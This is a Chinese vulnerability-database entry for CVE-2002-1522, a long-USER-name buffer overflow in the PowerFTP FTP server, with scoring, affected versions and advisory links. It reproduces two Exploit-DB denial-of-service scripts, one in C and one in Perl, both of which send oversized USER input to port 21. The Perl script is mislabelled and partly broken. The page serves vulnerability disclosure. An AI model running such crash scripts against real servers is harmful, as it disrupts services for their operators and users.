CVE-2002-1522
CVSS5.0
发布时间 :2003-04-02 00:00:00
修订时间 :2008-09-05 16:30:49
NMCOES    

[原文]Buffer overflow in PowerFTP FTP server 2.24, and possibly other versions, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long USER argument.


[CNNVD]Cooolsoft PowerFTP Server长用户名远程拒绝服务攻击漏洞(CNNVD-200304-066)

        
        PowerFTP是一款小型的FTP服务程序,使用在Microsoft Windows操作系统下,由Cooolsoft开发和维护。
        PowerFTP对于超长的处理长用户名请求处理不正确,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        攻击者可以提供超过3000个字节的字符串作为用户名给PowerFTP服务程序,FTP服务程序就会变的不稳定,需要手工启动才能获得正常服务。由于此问题由缓冲区溢出造成,可能导致以FTP进程的权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:cooolsoft:powerftp:2.23
cpe:/a:cooolsoft:powerftp:2.03
cpe:/a:cooolsoft:powerftp:2.10
cpe:/a:cooolsoft:powerftp:2.24

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1522
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1522
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-066
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5899
(VENDOR_ADVISORY)  BID  5899
http://www.iss.net/security_center/static/10286.php
(VENDOR_ADVISORY)  XF  powerftp-long-username-dos(10286)
http://archives.neohapsis.com/archives/bugtraq/2002-10/0075.html
(UNKNOWN)  BUGTRAQ  20021005 Vulnerabilitie in PowerFTP server
http://archives.neohapsis.com/archives/bugtraq/2002-10/0194.html
(UNKNOWN)  BUGTRAQ  20021012 Coolsoft PowerFTP <= v2.24 Denial of Service (Linux Source)

- 漏洞信息

Cooolsoft PowerFTP Server长用户名远程拒绝服务攻击漏洞
中危 边界条件错误
2003-04-02 00:00:00 2005-10-20 00:00:00
远程  
        
        PowerFTP是一款小型的FTP服务程序,使用在Microsoft Windows操作系统下,由Cooolsoft开发和维护。
        PowerFTP对于超长的处理长用户名请求处理不正确,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        攻击者可以提供超过3000个字节的字符串作为用户名给PowerFTP服务程序,FTP服务程序就会变的不稳定,需要手工启动才能获得正常服务。由于此问题由缓冲区溢出造成,可能导致以FTP进程的权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Coolsoft
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.cooolsoft.com/powerftp.htm

- 漏洞信息 (21907)

Cooolsoft PowerFTP Server 2.x Remote Denial Of Service Vulnerability (1) (EDBID:21907)
windows dos
2002-10-05 Verified
0 Morgan
N/A [点击下载]
source: http://www.securityfocus.com/bid/5899/info

PowerFTP server is a shareware ftp server available for the Microsoft Windows platform. It is distributed and maintained by Cooolsoft.

It has been reported that PowerFTP server does not properly handle long user names. When excessive data is supplied as an argument to the FTP 'USER' command, the server becomes unstable. Exploitation of this vulnerability typically results in a crash of the server, requiring a manual restart to resume FTP service. 

/* Remote DoS Exploit for PowerFTP server (all version) */
/* Coding by Morgan A. member of secureNT-2000 Greetz : */
/* kdm, Yann, GaLiaRepT, and all i've forgotten ;)      */

#include <stdio.h>
#include <winsock.h>
        #pragma comment(lib, "wsock32.lib")

void main()
        {
        WSADATA WSAData;
                WSAStartup(MAKEWORD(2,0), &WSAData);

                SOCKET sock;
                SOCKADDR_IN sin;
                char *buffer = new char[255];

        char ip[50];
        printf ("Remote DoS Exploit for PowerFTP server\n\n");
        printf ("Remote IP: ");
        scanf ("%s", &ip);

        char DoS[3000];
        int i;
        for(i=0;i<strlen(DoS);i++)
        {
        DoS[i]= 'A';
        }

        sock = socket(AF_INET, SOCK_STREAM, 0);

                sin.sin_addr.s_addr                     = inet_addr(ip);
                sin.sin_family                          = AF_INET;
                sin.sin_port                            = htons(21);

                connect(sock, (SOCKADDR *)&sin, sizeof(sin));
                send(sock, DoS, sizeof(DoS), 0);
                closesocket(sock);
                WSACleanup();
        }
		

- 漏洞信息 (21908)

Cooolsoft PowerFTP Server 2.x Remote Denial Of Service Vulnerability (2) (EDBID:21908)
windows dos
2002-10-05 Verified
0 subj
N/A [点击下载]
source: http://www.securityfocus.com/bid/5899/info
 
PowerFTP server is a shareware ftp server available for the Microsoft Windows platform. It is distributed and maintained by Cooolsoft.
 
It has been reported that PowerFTP server does not properly handle long user names. When excessive data is supplied as an argument to the FTP 'USER' command, the server becomes unstable. Exploitation of this vulnerability typically results in a crash of the server, requiring a manual restart to resume FTP service. 

#!/usr/bin/perl
use IO::Socket;

##########################################################
#                                                        #
# Remote Stack Overflow sploit for PersonalFTPD          #
# If wanna talk with me find me on irc                   #
# irc.irochka.net #dwc, #global, #phreack                #
# ###################################################### #
# thanx to kabuto, drG4njubas, fnq                       #
# gr33tz to dhg, gipshack, rsteam, blacktigerz           #
# D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0     #
# ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z            #
# ###################################################### #
# Vulnerability links:                                   #
# http://security.nnov.ru/search/document.asp?docid=4309 #
# http://www.securityfocus.com/archive/1/316958          #
#                                                        #
##########################################################

$data = "A";

print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
print "[..]      by subj | dwc :: big 10x to Kabuto       [..]\n";
print "[..]    www.dwcgr0up.com www.dwcgr0up.com/subj/    [..]\n";
print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";

$count_param=@ARGV;
$n="0";
if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer
size\n\n"; exit; }
while ($n<$count_param) {
if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
$n++;
}
&connect;

sub connect
{
$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port",
Proto => "tcp")
        || die "Can\'t connect to $server port $port\n";
print $sock "USER $buffer\n";
print "Buffer has beens sended...";

}


close($sock);
exit;

		

- 漏洞信息 (21909)

Cooolsoft PowerFTP Server 2.x Remote Denial Of Service Vulnerability (3) (EDBID:21909)
windows dos
2002-10-05 Verified
0 p0pt4rtz
N/A [点击下载]
source: http://www.securityfocus.com/bid/5899/info
  
PowerFTP server is a shareware ftp server available for the Microsoft Windows platform. It is distributed and maintained by Cooolsoft.
  
It has been reported that PowerFTP server does not properly handle long user names. When excessive data is supplied as an argument to the FTP 'USER' command, the server becomes unstable. Exploitation of this vulnerability typically results in a crash of the server, requiring a manual restart to resume FTP service. 

http://www.exploit-db.com/sploits/21909.tgz		

- 漏洞信息

14551
PowerFTP FTP Server USER Argument Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-10-05 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Cooolsoft PowerFTP Server Remote Denial Of Service Vulnerability
Boundary Condition Error 5899
Yes No
2002-10-05 12:00:00 2009-07-12 05:56:00
Vulnerability discovery credited to Armand Morgan <morgan53@evhr.net>.

- 受影响的程序版本

Cooolsoft PowerFTP 2.25
Cooolsoft PowerFTP 2.24
Cooolsoft PowerFTP 2.23
Cooolsoft PowerFTP 2.10
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
Cooolsoft PowerFTP 2.0 3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0

- 漏洞讨论

PowerFTP server is a shareware ftp server available for the Microsoft Windows platform. It is distributed and maintained by Cooolsoft.

It has been reported that PowerFTP server does not properly handle long user names. When excessive data is supplied as an argument to the FTP 'USER' command, the server becomes unstable. Exploitation of this vulnerability typically results in a crash of the server, requiring a manual restart to resume FTP service.

- 漏洞利用

Exploits contributed by Armand Morgan , "a b" &lt;p0pt4rtz@hotmail.com&gt; and subj &lt;r2subj3ct@dwclan.org&gt;.

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站